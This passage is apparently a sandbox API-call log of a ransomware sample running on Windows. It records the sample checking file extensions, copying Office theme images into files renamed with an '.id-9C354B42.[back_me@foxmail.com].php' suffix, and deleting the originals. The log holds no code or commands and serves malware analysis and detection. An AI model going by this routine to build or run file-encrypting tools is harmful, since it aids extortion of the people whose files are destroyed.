[0047.259] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0047.259] lstrlenW (lpString=".zip") returned 4 [0047.259] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.260] lstrlenW (lpString=".rar") returned 4 [0047.260] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.260] lstrlenW (lpString=".bz2") returned 4 [0047.260] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.260] lstrlenW (lpString=".7z") returned 3 [0047.260] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0047.260] lstrlenW (lpString=".dbf") returned 4 [0047.260] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0047.260] lstrlenW (lpString=".1cd") returned 4 [0047.260] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0047.260] lstrlenW (lpString=".jpg") returned 4 [0047.260] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.260] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0047.260] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.261] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=5179) returned 1 [0047.261] CloseHandle (hObject=0x214) returned 1 [0047.261] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif")) returned 0x20 [0047.261] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.261] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.261] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0047.759] GetLastError () returned 0x0 [0047.759] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x143b, lpOverlapped=0x0) returned 1 [0047.871] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x1440, lpOverlapped=0x0) returned 1 [0047.872] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.872] WriteFile (in: hFile=0x1b4, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.872] SetEndOfFile (hFile=0x1b4) returned 1 [0047.872] CloseHandle (hObject=0x1b4) returned 1 [0047.872] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.872] SetEndOfFile (hFile=0x214) returned 1 [0047.873] CloseHandle (hObject=0x214) returned 1 [0047.873] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.873] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif")) returned 1 [0047.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0047.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0047.874] lstrlenW (lpString=".doc") returned 4 [0047.874] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.874] lstrlenW (lpString=".docx") returned 5 [0047.874] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.874] lstrlenW (lpString=".pdf") returned 4 [0047.874] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.874] lstrlenW (lpString=".xls") returned 4 [0047.874] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.874] lstrlenW (lpString=".xlsx") returned 5 [0047.874] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.874] lstrlenW (lpString=".ppt") returned 4 [0047.874] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0047.874] lstrlenW (lpString=".zip") returned 4 [0047.874] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.874] lstrlenW (lpString=".rar") returned 4 [0047.874] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.874] lstrlenW (lpString=".bz2") returned 4 [0047.874] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.874] lstrlenW (lpString=".7z") returned 3 [0047.874] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0047.874] lstrlenW (lpString=".dbf") returned 4 [0047.874] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0047.874] lstrlenW (lpString=".1cd") returned 4 [0047.875] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0047.875] lstrlenW (lpString=".jpg") returned 4 [0047.875] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0047.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0047.875] lstrlenW (lpString=".doc") returned 4 [0047.875] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.875] lstrlenW (lpString=".docx") returned 5 [0047.875] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.875] lstrlenW (lpString=".pdf") returned 4 [0047.875] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.875] lstrlenW (lpString=".xls") returned 4 [0047.875] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.875] lstrlenW (lpString=".xlsx") returned 5 [0047.875] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.875] lstrlenW (lpString=".ppt") returned 4 [0047.875] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0047.875] lstrlenW (lpString=".zip") returned 4 [0047.875] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.875] lstrlenW (lpString=".rar") returned 4 [0047.875] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.875] lstrlenW (lpString=".bz2") returned 4 [0047.875] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.875] lstrlenW (lpString=".7z") returned 3 [0047.875] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0047.875] lstrlenW (lpString=".dbf") returned 4 [0047.875] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0047.875] lstrlenW (lpString=".1cd") returned 4 [0047.875] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0047.876] lstrlenW (lpString=".jpg") returned 4 [0047.876] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.876] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0047.876] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.876] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.191] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=16738) returned 1 [0048.191] CloseHandle (hObject=0x210) returned 1 [0048.191] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 0x20 [0048.191] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.191] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.191] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0048.191] GetLastError () returned 0x0 [0048.191] ReadFile (in: hFile=0x210, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x4162, lpOverlapped=0x0) returned 1 [0048.193] WriteFile (in: hFile=0x1f8, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x4170, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x4170, lpOverlapped=0x0) returned 1 [0048.194] ReadFile (in: hFile=0x210, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.194] WriteFile (in: hFile=0x1f8, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.195] SetEndOfFile (hFile=0x1f8) returned 1 [0048.195] CloseHandle (hObject=0x1f8) returned 1 [0048.195] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.195] SetEndOfFile (hFile=0x210) returned 1 [0048.196] CloseHandle (hObject=0x210) returned 1 [0048.196] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.196] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png")) returned 1 [0048.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0048.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0048.196] lstrlenW (lpString=".doc") returned 4 [0048.196] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.196] lstrlenW (lpString=".docx") returned 5 [0048.196] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.196] lstrlenW (lpString=".pdf") returned 4 [0048.196] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.196] lstrlenW (lpString=".xls") returned 4 [0048.196] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.197] lstrlenW (lpString=".xlsx") returned 5 [0048.197] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.197] lstrlenW (lpString=".ppt") returned 4 [0048.197] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0048.197] lstrlenW (lpString=".zip") returned 4 [0048.197] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.197] lstrlenW (lpString=".rar") returned 4 [0048.197] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.197] lstrlenW (lpString=".bz2") returned 4 [0048.197] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.197] lstrlenW (lpString=".7z") returned 3 [0048.197] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0048.197] lstrlenW (lpString=".dbf") returned 4 [0048.197] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0048.197] lstrlenW (lpString=".1cd") returned 4 [0048.197] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0048.197] lstrlenW (lpString=".jpg") returned 4 [0048.197] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0048.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0048.197] lstrlenW (lpString=".doc") returned 4 [0048.197] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.197] lstrlenW (lpString=".docx") returned 5 [0048.197] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.197] lstrlenW (lpString=".pdf") returned 4 [0048.197] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.197] lstrlenW (lpString=".xls") returned 4 [0048.197] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.197] lstrlenW (lpString=".xlsx") returned 5 [0048.198] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.198] lstrlenW (lpString=".ppt") returned 4 [0048.198] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0048.198] lstrlenW (lpString=".zip") returned 4 [0048.198] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.198] lstrlenW (lpString=".rar") returned 4 [0048.198] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.198] lstrlenW (lpString=".bz2") returned 4 [0048.198] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.198] lstrlenW (lpString=".7z") returned 3 [0048.198] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0048.198] lstrlenW (lpString=".dbf") returned 4 [0048.198] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0048.198] lstrlenW (lpString=".1cd") returned 4 [0048.198] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 76 [0048.198] lstrlenW (lpString=".jpg") returned 4 [0048.198] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.198] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0048.198] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.198] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.199] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=2604) returned 1 [0048.199] CloseHandle (hObject=0x210) returned 1 [0048.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif")) returned 0x20 [0048.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.199] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.199] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0048.201] GetLastError () returned 0x0 [0048.201] ReadFile (in: hFile=0x210, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0xa2c, lpOverlapped=0x0) returned 1 [0048.202] WriteFile (in: hFile=0x1f8, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xa30, lpOverlapped=0x0) returned 1 [0048.203] ReadFile (in: hFile=0x210, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.203] WriteFile (in: hFile=0x1f8, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.203] SetEndOfFile (hFile=0x1f8) returned 1 [0048.203] CloseHandle (hObject=0x1f8) returned 1 [0048.203] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.203] SetEndOfFile (hFile=0x210) returned 1 [0048.204] CloseHandle (hObject=0x210) returned 1 [0048.204] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.204] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\preview.gif")) returned 1 [0048.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.205] lstrlenW (lpString=".doc") returned 4 [0048.205] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.205] lstrlenW (lpString=".docx") returned 5 [0048.205] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.205] lstrlenW (lpString=".pdf") returned 4 [0048.205] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.205] lstrlenW (lpString=".xls") returned 4 [0048.205] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.205] lstrlenW (lpString=".xlsx") returned 5 [0048.205] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.205] lstrlenW (lpString=".ppt") returned 4 [0048.205] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.205] lstrlenW (lpString=".zip") returned 4 [0048.205] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.205] lstrlenW (lpString=".rar") returned 4 [0048.205] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.205] lstrlenW (lpString=".bz2") returned 4 [0048.205] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.205] lstrlenW (lpString=".7z") returned 3 [0048.205] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.205] lstrlenW (lpString=".dbf") returned 4 [0048.205] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.205] lstrlenW (lpString=".1cd") returned 4 [0048.205] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.205] lstrlenW (lpString=".jpg") returned 4 [0048.205] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.206] lstrlenW (lpString=".doc") returned 4 [0048.206] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.206] lstrlenW (lpString=".docx") returned 5 [0048.206] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.206] lstrlenW (lpString=".pdf") returned 4 [0048.206] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.206] lstrlenW (lpString=".xls") returned 4 [0048.206] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.206] lstrlenW (lpString=".xlsx") returned 5 [0048.206] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.206] lstrlenW (lpString=".ppt") returned 4 [0048.206] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.206] lstrlenW (lpString=".zip") returned 4 